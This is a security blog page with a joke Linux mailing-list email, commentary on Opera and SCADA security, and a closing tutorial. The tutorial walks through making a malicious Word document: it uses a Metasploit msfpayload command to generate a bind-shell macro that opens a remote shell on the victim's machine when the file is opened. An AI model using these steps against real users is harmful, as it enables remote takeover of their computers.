Comic strips by our cartoon-writing-bloggers

Funniest E-mail sent to the LKML (Linux Kernel Mailing List)

This is just so very very wrong! Original e-mail can be found here.
“Hi, all

I have two machines that show very different performance numbers.

After digging a little I found out that the first machine has, in

model name      : Intel(R) Celeron(R) M processor         1.00GHz

while the other has:

model name      : Intel(R) Core(TM)2 Quad CPU    Q6600  @ 2.40GHz

and that seems to be the main difference.

Now the problem is that /proc/cpuinfo is read only. Would it be possible
to make /proc/cpuinfo writable so that I could do:

echo -n “model name      : Intel(R) Core(TM)2 Quad CPU    Q6600  @
2.40GHz” > /proc/cpuinfo
in the first machine and get a performance similar to the second machine?”

Opera’s Latest Hitman

Opera Logo

Opera the web browser is apparently now great at one thing: following the standards.

Yesterday, Opera 10 Alpha was released and flaunted its 100/100 score on the Acid3 test, passing with all the colors of the rainbow this time. But honestly, Opera, like several other ‘alternative’ browsers (and if your a hardcore fan/follower, excuse me), is just trying to catch up with the old dogs.

Firefox in particular has had many of Opera’s ‘new’ features and ‘improvements’ for quite a while. Security issues in Opera, often simple and totally trivial bugs, have been found and released. Not saying more than other browsers; both Firefox and Internet Explorer have them doubled to say the least, but I just never could bring myself to trust this unique web browser.

Auto-update has just been put in place, and I feel, as a security researcher, that it is an extremely valuable mitigation tool when new exploits spring up. Thank God the development team FINALLY put this sub-standard feature in place. Presto 2.2 has taken things to the next level with most of these improvements, more details of which you can find for windows, mac, and ‘linux/unix‘.

Has security been incorporated into Opera recently more than ever? Maybe. Has Opera been built with security from the ground up? Certainly not. Pay attention to your favorite XYZ exploit/advisory feed for inevitable updates.

SCADA Security

SCADA Operator

I’ve been registered with the SCADA Security Mailing List for a while now, and I must say it is very informative and has some solid discussion about SCADA systems and security. If you are not familiar with what SCADA is, it stands for Supervisory Control And Data Acquisition. SCADA systems are generally used for controlling and maintaining public services and private sector systems such as but not limited to nuclear plants, environmental systems, industrial stations, etc. You can google for more information or check our SCADA’s Wikipedia Page.

Security has and also been a big issue with running SCADA systems, especially those connected and maintained over the internet, or really any kind of network. Firewalls and IDS’s can only do so much; the integrity of the applications must be a part of the solution, AND NOT COLLAPSE! There are also many books at amazon that deal with SCADA systems. Could the internal workings of outdated coding practices and weak security in the systems, that control our precious resources and way of life, prove to be insecure? You better believe it.

Writing malicious macros using metasploit

This is actually a nice little feature of Metasploit which many of us are not aware. Here I will guide you through this.

Metasploit is nice tool written in ruby and very useful to penetration testers (and script kiddies) It provides good information on exploit techniques and is also a useful resource for exploit developers and security professionals. Latest release is 3.1 version as of now and its upcoming version 3.2 will be more hack-pack.

Enough of insight into metasploit, now back to action. We will create a malicious .doc file which will spawn a tcp shell on port 8888 on simply opening the file. However remember that MACROs must be enabled on victim’s system.
1. Go to Start–>All Programs–>Metasploit–>CMD SHELL.

2. type cd %APPDATA%
3. Next type in: ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba
4. Now to use this malicious vba file, open Microsoft Word/Excel.

5. Go to tools–>Macros–>Visual Basic Editor. Copy the contents of vba file and paste in the VB editor.

6. To enable macro tools–>Macros–>Security. Select the security level as low.

You get this alert window up when macro is disabled.

7. Now save the doc file.

8. On opening the seemingly harmless file, it will automatically spawn a cmd shell on port 8888.

Telnet on that port to spawn a command shell.

So now we have a malicious doc ready for action. We can use any available payload like connect back to attacker or even vnc inject payload. Hope this is helpful.